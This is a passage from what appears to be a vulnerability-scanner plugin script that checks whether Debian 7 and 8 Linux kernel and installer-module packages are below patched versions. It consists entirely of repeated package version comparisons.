reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-all-i386\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-all-ia64\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-all-mips\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-all-mipsel\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-all-powerpc\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-all-s390\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-all-s390x\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-all-sparc\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-amd64\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-common\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-common-rt\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-iop32x\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-itanium\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-ixp4xx\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-kirkwood\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-loongson-2f\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-mckinley\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-mv78xx0\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-mx5\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-octeon\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-omap\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-orion5x\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-powerpc\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-powerpc-smp\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-powerpc64\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-r4k-ip22\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-r5k-cobalt\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-r5k-ip32\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-rt-686-pae\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-rt-amd64\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-s390x\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-sb1-bcm91250a\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-sparc64\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-sparc64-smp\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-versatile\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-vexpress\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-486\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-4kc-malta\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-5kc-malta\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-686-pae\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-686-pae-dbg\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-amd64\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-amd64-dbg\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-iop32x\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-itanium\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-ixp4xx\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-kirkwood\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-loongson-2f\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-mckinley\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-mv78xx0\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-mx5\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-octeon\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-omap\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-orion5x\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-powerpc\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-powerpc-smp\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-powerpc64\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-r4k-ip22\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-r5k-cobalt\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-r5k-ip32\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-rt-686-pae\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-rt-686-pae-dbg\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-rt-amd64\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-rt-amd64-dbg\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-s390x\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-s390x-dbg\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-s390x-tape\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-sb1-bcm91250a\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-sb1a-bcm91480b\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-sparc64\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-sparc64-smp\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-versatile\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-image-3.2.0-4-vexpress\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-libc-dev\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-manual-3.2\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-source-3.2\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-support-3.2.0-4\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-linux-system-3.2.0-4-686-pae\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-linux-system-3.2.0-4-amd64\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"acpi-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"acpi-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"acpi-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"affs-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"affs-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"affs-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"affs-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"affs-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"affs-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"affs-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"affs-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ata-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ata-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ata-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ata-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ata-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ata-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ata-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ata-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ata-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ata-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ata-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ata-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"btrfs-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"cdrom-core-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"core-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"core-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"core-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"core-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"core-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"core-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"core-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"core-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"core-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"core-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"core-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"core-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crc-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-dm-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-orion5x-di\", 